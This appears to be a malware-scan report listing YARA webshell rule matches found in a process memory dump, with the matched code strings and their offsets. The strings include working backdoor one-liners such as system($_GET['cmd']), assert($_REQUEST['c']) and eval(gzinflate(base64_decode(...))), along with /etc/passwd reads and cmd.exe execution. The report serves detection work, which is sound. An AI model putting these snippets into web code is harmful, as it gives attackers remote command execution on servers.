| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_wsb_idc | Web Shell - file idc.php | Florian Roth | - 0x203c7:$s1: if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)
- 0x20406:$s3: {eval($_GET['idc']);}
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_cpg_143_incl_xpl | Web Shell - file cpg_143_incl_xpl.php | Florian Roth | - 0x204f4:$s3: $data="username=".urlencode($USER)."&password=".urlencode($PA
- 0x20536:$s5: fputs($sun_tzu,"<?php echo \"Hi Master!\";ini_set(\"max_execution_time
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_mumaasp_com | Web Shell - file mumaasp.com.asp | Florian Roth | - 0x2064b:$s0: &9K_)P82ai,A}I92]R"q!C:RZ}S6]=PaTTR
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_404 | Web Shell - file 404.php | Florian Roth | - 0x20731:$s0: $pass = md5(md5(md5($pass)));
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshell_cnseay_x | Web Shell - file webshell-cnseay-x.php | Florian Roth | - 0x20829:$s9: $_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_up | Web Shell - file up.asp | Florian Roth | - 0x20932:$s0: Pos = InstrB(BoundaryPos,RequestBin,getByteString("Content-Dispositio
- 0x2097c:$s1: ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_phpkit_0_1a_odd | Web Shell - file odd.php | Florian Roth | - 0x1fab2:$s1: include('php://input');
- 0x20a85:$s1: include('php://input');
- 0x1fb1d:$s3: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
- 0x20aa1:$s3: ini_set('allow_url_include, 1'); // Allow url inclusion in this script
- 0x20aec:$s4: // uses include('php://input') to execute arbritary code
- 0x20b29:$s5: // php://input based backdoor
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ASP_cmd | Web Shell - file cmd.asp | Florian Roth | - 0x1c490:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x20c09:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x248fd:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x425d1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x4c448:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_Shell_x3 | Web Shell - file PHP Shell.php | Florian Roth | - 0x20d18:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x2280b:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x20d54:$s6: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x367c7:$s6: echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input
- 0x20da0:$s9: if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_g00nv13 | Web Shell - file g00nv13.php | Florian Roth | - 0x20eb7:$s1: case "zip": case "tar": case "rar": case "gz": case "cab": cas
- 0x20efa:$s4: if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_h6ss | Web Shell - file h6ss.php | Florian Roth | - 0x2100b:$s0: <?php eval(gzuncompress(base64_decode("
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_zx | Web Shell - file zx.jsp | Florian Roth | - 0x210f3:$s0: if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.g
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Ani_Shell | Web Shell - file Ani-Shell.php | Florian Roth | - 0x2120c:$s0: $Python_CODE = "I
- 0x21222:$s6: $passwordPrompt = "\n=================================================
- 0x2126d:$s7: fputs ($sockfd ,"\n===============================================
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_k8cmd | Web Shell - file k8cmd.jsp | Florian Roth | - 0x21376:$s2: if(request.getSession().getAttribute("hehe").toString().equals("hehe"))
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_cmd | Web Shell - file cmd.jsp | Florian Roth | - 0x21480:$s6: out.println("Command: " + request.getParameter("cmd") + "<BR>");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_k81 | Web Shell - file k81.jsp | Florian Roth | - 0x21583:$s1: byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);
- 0x215cc:$s9: if(cmd.equals("Szh0ZWFt")){out.print("[S]"+dir+"[E]");}
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ASP_zehir | Web Shell - file zehir.asp | Florian Roth | - 0x216ca:$s9: Response.Write "<font face=wingdings size=3><a href='"&dosyaPath&"?status=18&
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Worse_Linux_Shell | Web Shell - file Worse Linux Shell.php | Florian Roth | - 0x217f2:$s0: system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_zacosmall | Web Shell - file zacosmall.php | Florian Roth | - 0x218f4:$s0: if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x21a67:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
- 0x3fc7a:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_redirect | Web Shell - file redirect.asp | Florian Roth | - 0x21b64:$s7: var flag = "?txt=" + (document.getElementById("dl").checked ? "2":"1"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_cmdjsp | Web Shell - file cmdjsp.jsp | Florian Roth | - 0x21c73:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
- 0x2421c:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Java_Shell | Web Shell - file Java Shell.jsp | Florian Roth | - 0x21d65:$s4: public JythonShell(int columns, int rows, int scrollback) {
- 0x21da5:$s9: this(null, Py.getSystemState(), columns, rows, scrollback);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_1d | Web Shell - file 1d.asp | Florian Roth | - 0x21ea1:$s0: +9JkskOfKhUxZJPL~\(mD^W~[,{@#@&EO
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_IXRbE | Web Shell - file IXRbE.jsp | Florian Roth | - 0x21f89:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x258ff:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_G5 | Web Shell - file G5.php | Florian Roth | - 0x22098:$s3: echo "Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_r57142 | Web Shell - file r57142.php | Florian Roth | - 0x221b0:$s0: $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_tree | Web Shell - file tree.jsp | Florian Roth | - 0x222c3:$s5: $('#tt2').tree('options').url = "selectChild.action?checki
- 0x22302:$s6: String basePath = request.getScheme()+"://"+request.getServerName()+":"+requ
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_C99madShell_v_3_0_smowu | Web Shell - file smowu.php | Florian Roth | - 0x22423:$s2: <tr><td width="50%" height="1" valign="top"><center><b>:: Enter ::</b><for
- 0x22472:$s8: <p><font color=red>Wordpress Not Found! <input type=text id="wp_pat"><input ty
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_simple_backdoor | Web Shell - file simple-backdoor.php | Florian Roth | - 0x22597:$s0: $cmd = ($_REQUEST['cmd']);
- 0x33e38:$s0: $cmd = ($_REQUEST['cmd']);
- 0x4191e:$s0: $cmd = ($_REQUEST['cmd']);
- 0x225b6:$s1: if(isset($_REQUEST['cmd'])){
- 0x41957:$s1: if(isset($_REQUEST['cmd'])){
- 0x42022:$s1: if(isset($_REQUEST['cmd'])){
- 0x225d7:$s4: system($cmd);
- 0x41991:$s4: system($cmd);
- 0x42043:$s4: system($cmd);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_404 | Web Shell - file 404.php | Florian Roth | - 0x226a7:$s4: <span>Posix_getpwuid ("Read" /etc/passwd)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Macker_s_Private_PHPShell | Web Shell - file Macker\'s Private PHPShell.php | Florian Roth | - 0x227bb:$s3: echo "<tr><td class=\"silver border\"> <strong>Server's PHP Version:&n
- 0x20d18:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x2280b:$s4: <?php echo buildUrl("<font color=\"navy\">[
- 0x22847:$s7: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
- 0x36813:$s7: echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Antichat_Shell_v1_3_2 | Web Shell - file Antichat Shell v1.3.php | Florian Roth | - 0x2296e:$s3: $header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><m
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Safe_mode_breaker | Web Shell - file Safe mode breaker.php | Florian Roth | - 0x22a97:$s5: preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(
- 0x22adf:$s6: $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL).
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Sst_Sheller | Web Shell - file Sst-Sheller.php | Florian Roth | - 0x22be6:$s2: echo "<a href='?page=filemanager&id=fm&fchmod=$dir$file'>
- 0x22c24:$s3: <? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_list | Web Shell - file list.jsp | Florian Roth | - 0x200cb:$s0: <FORM METHOD="POST" NAME="myform" ACTION="">
- 0x22d39:$s0: <FORM METHOD="POST" NAME="myform" ACTION="">
- 0x22d6a:$s2: out.print(") <A Style='Color: " + fcolor.toString() + ";' HRef='?file=" + fn
- 0x22dbb:$s7: if(flist[i].canRead() == true) out.print("r" ); else out.print("-");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHPJackal_v1_5 | Web Shell - file PHPJackal v1.5.php | Florian Roth | - 0x22ed4:$s7: echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form
- 0x22f24:$s8: echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_customize | Web Shell - file customize.jsp | Florian Roth | - 0x1e035:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2303a:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x251ee:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_s72_Shell_v1_1_Coding | Web Shell - file s72 Shell v1.1 Coding.php | Florian Roth | - 0x23168:$s5: <font face="Verdana" style="font-size: 8pt" color="#800080">Buradan Dosya
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_sys3 | Web Shell - file sys3.jsp | Florian Roth | - 0x1fcc0:$s1: <input type="submit" name="btnSubmit" value="Upload">
- 0x23277:$s1: <input type="submit" name="btnSubmit" value="Upload">
- 0x25304:$s1: <input type="submit" name="btnSubmit" value="Upload">
- 0x1bff3:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x1fc72:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x232b1:$s4: String path=new String(request.getParameter("path").getBytes("ISO-8859-1"
- 0x232ff:$s9: <%@page contentType="text/html;charset=gb2312"%>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_guige02 | Web Shell - file guige02.jsp | Florian Roth | - 0x233fa:$s0: ????????????????%><html><head><title>hahahaha</title></head><body bgcolor="#fff
- 0x2344e:$s1: <%@page contentType="text/html; charset=GBK" import="java.io.*;"%><%!private
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_ghost | Web Shell - file ghost.php | Florian Roth | - 0x23561:$s1: <?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'
- 0x235b6:$s6: //<img width=1 height=1 src="http://websafe.facaiok.com/just7z/sx.asp?u=***.***
- 0x2360a:$s7: preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(KmU("
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_WinX_Shell | Web Shell - file WinX Shell.php | Florian Roth | - 0x23706:$s5: print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Filenam
- 0x2374d:$s8: print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Crystal_Crystal | Web Shell - file Crystal.php | Florian Roth | - 0x2385f:$s1: show opened ports</option></select><input type="hidden" name="cmd_txt" value
- 0x238b0:$s6: " href="?act=tools"><font color=#CC0000 size="3">Tools</font></a></span></f
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_r57_1_4_0 | Web Shell - file r57.1.4.0.php | Florian Roth | - 0x239c6:$s4: @ini_set('error_log',NULL);
- 0x31327:$s4: @ini_set('error_log',NULL);
- 0x239e6:$s6: $pass='abcdef1234567890abcdef1234567890';
- 0x312a4:$s6: $pass='abcdef1234567890abcdef1234567890';
- 0x23a14:$s7: @ini_restore("disable_functions");
- 0x23a3b:$s9: @ini_restore("safe_mode_exec_dir");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_hsxa1 | Web Shell - file hsxa1.jsp | Florian Roth | - 0x1dee2:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
- 0x23b25:$s0: <%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="ja
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_ajn | Web Shell - file ajn.asp | Florian Roth | - 0x23c33:$s1: seal.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
- 0x23c7c:$s6: seal.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOve
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_cmd | Web Shell - file cmd.php | Florian Roth | - 0x23d89:$s0: if($_GET['cmd']) {
- 0x23da0:$s1: // cmd.php = Command Execution
- 0x23dc3:$s7: system($_GET['cmd']);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_list | Web Shell - file list.asp | Florian Roth | - 0x23e9f:$s0: <INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
- 0x23ed7:$s4: Response.Write("<h3>FILE: " & file & "</h3>")
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_co | Web Shell - file co.php | Florian Roth | - 0x23fc5:$s0: cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV
- 0x23ff3:$s11: 6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_150 | Web Shell - file 150.php | Florian Roth | - 0x240de:$s0: HJ3HjqxclkZfp
- 0x240f0:$s1: <? eval(gzinflate(base64_decode('
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_cmdjsp_2 | Web Shell - file cmdjsp.jsp | Florian Roth | - 0x241dc:$s0: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x389f7:$s0: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x21c73:$s4: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
- 0x2421c:$s4: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_c37 | Web Shell - file c37.php | Florian Roth | - 0x24304:$s3: array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),
- 0x24342:$s9: ++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_b37 | Web Shell - file b37.php | Florian Roth | - 0x24455:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_backdoor | Web Shell - file php-backdoor.php | Florian Roth | - 0x24556:$s1: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
- 0x245aa:$s2: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
- 0x3fe9e:$s2: <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_dabao | Web Shell - file dabao.asp | Florian Roth | - 0x246bf:$s2: Echo "<input type=button name=Submit onclick=""document.location ='" &
- 0x24710:$s8: Echo "document.Frm_Pack.FileName.value=""""+year+""-""+(month+1)+""-
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_2 | Web Shell - file 2.php | Florian Roth | - 0x24814:$s0: <?php assert($_REQUEST["c"]);?>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_cmdasp | Web Shell - file cmdasp.asp | Florian Roth | - 0x1c490:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x20c09:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x248fd:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x425d1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x4c448:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x1c51b:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x24943:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x42548:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4aa86:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4c48e:$s7: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_spjspshell | Web Shell - file spjspshell.jsp | Florian Roth | - 0x24a56:$s7: Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_action | Web Shell - file action.jsp | Florian Roth | - 0x24b6b:$s1: String url="jdbc:oracle:thin:@localhost:1521:orcl";
- 0x24ba3:$s6: <%@ page contentType="text/html;charset=gb2312"%>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_Inderxer | Web Shell - file Inderxer.asp | Florian Roth | - 0x24c9d:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x3555a:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
- 0x4c686:$s4: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input typ
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_Rader | Web Shell - file Rader.asp | Florian Roth | - 0x24db0:$s1: FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0
- 0x24e05:$s3: m" target=inf onClick="window.open('?action=help','inf','width=450,height=400
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_c99_madnet_smowu | Web Shell - file smowu.php | Florian Roth | - 0x24f21:$s0: //Authentication
- 0x40c1a:$s0: //Authentication
- 0x4236d:$s0: //Authentication
- 0x24f36:$s1: $login = "
- 0x42354:$s1: $login = "
- 0x240f3:$s2: eval(gzinflate(base64_decode('
- 0x24f45:$s2: eval(gzinflate(base64_decode('
- 0x312d2:$s2: eval(gzinflate(base64_decode('
- 0x3268d:$s2: eval(gzinflate(base64_decode('
- 0x40bb1:$s2: eval(gzinflate(base64_decode('
- 0x42319:$s2: eval(gzinflate(base64_decode('
- 0x24f68:$s4: //Pass
- 0x40be5:$s4: //Pass
- 0x42349:$s4: //Pass
- 0x24f73:$s5: $md5_pass = "
- 0x40b86:$s5: $md5_pass = "
- 0x422ee:$s5: $md5_pass = "
- 0x24f85:$s6: //If no pass then hash
- 0x40b96:$s6: //If no pass then hash
- 0x422fe:$s6: //If no pass then hash
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_php_moon | Web Shell - file moon.php | Florian Roth | - 0x25060:$s2: echo '<option value="create function backshell returns string soname
- 0x250a9:$s3: echo "<input name='p' type='text' size='27' value='".dirname(_FILE_)."
- 0x250f9:$s8: echo '<option value="select cmdshell(\'net user
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_jdbc | Web Shell - file jdbc.jsp | Florian Roth | - 0x1e035:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x2303a:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
- 0x251ee:$s4: String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_minupload | Web Shell - file minupload.jsp | Florian Roth | - 0x1fcc0:$s0: <input type="submit" name="btnSubmit" value="Upload">
- 0x25304:$s0: <input type="submit" name="btnSubmit" value="Upload">
- 0x1bff3:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x1fc72:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x232b1:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
- 0x25341:$s9: String path=new String(request.getParameter("path").getBytes("ISO-8859
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ELMALISEKER_Backd00r | Web Shell - file ELMALISEKER Backd00r.asp | Florian Roth | - 0x25468:$s0: response.write("<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio
- 0x254bc:$s2: if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or req
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_PHP_bug_1_ | Web Shell - file bug (1).php | Florian Roth | - 0x255d0:$s0: @include($_GET['bug']);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_caidao_shell_hkmjj | Web Shell - file hkmjj.asp | Florian Roth | - 0x256b7:$s6: codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_asd | Web Shell - file asd.jsp | Florian Roth | - 0x1dee2:$s3: <%@ page language="java" pageEncoding="gbk"%>
- 0x23b25:$s3: <%@ page language="java" pageEncoding="gbk"%>
- 0x257bc:$s3: <%@ page language="java" pageEncoding="gbk"%>
- 0x257ee:$s6: <input size="100" value="<%=application.getRealPath("/") %>" name="url
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_jsp_inback3 | Web Shell - file inback3.jsp | Florian Roth | - 0x21f89:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
- 0x258ff:$s0: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_metaslsoft | Web Shell - file metaslsoft.php | Florian Roth | - 0x25a1a:$s7: $buff .= "<tr><td><a href=\"?d=".$pwd."\">[ $folder ]</a></td><td>LINK</t
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_asp_Ajan | Web Shell - file Ajan.asp | Florian Roth | - 0x25b28:$s3: entrika.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreate
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_config_myxx_zend | Web Shell - from files config.jsp, myxx.jsp, zend.jsp | Florian Roth | - 0x25cb5:$s3: .println("<a href=\"javascript:alert('You Are In File Now ! Can Not Pack !');
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_browser_201_3_ma_download | Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp | Florian Roth | - 0x25eaf:$s2: <small>jsp File Browser version <%= VERSION_NR%> by <a
- 0x25eea:$s3: else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_itsec_itsecteam_shell_jHn | Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php | Florian Roth | - 0x2608b:$s4: echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<b
- 0x260dd:$s5: echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_ghost_source_icesword_silic | Web Shell - from files ghost_source.php, icesword.php, silic.php | Florian Roth | - 0x26285:$s3: if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $
- 0x262da:$s6: if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST[
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_spy2009_m_ma3_xxx | Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x26872:$s8: "<form action=\""+SHELL_NAME+"?o=upload\" method=\"POST\" enctype=
- 0x268b9:$s9: <option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\T
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_2_520_job_ma1_ma4_2 | Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp | Florian Roth | - 0x26acc:$s4: _url = "jdbc:microsoft:sqlserver://" + dbServer + ":" + dbPort + ";User="
- 0x26b1b:$s9: result += "<meta http-equiv=\"refresh\" content=\"2;url=" + request.getR
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_000_403_807_a_c5_config_css_dm_he1p_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_xxx | Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp | Florian Roth | - 0x27139:$s0: ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500";
- 0x2717f:$s1: private static class VEditPropertyInvoker extends DefaultInvoker {
|
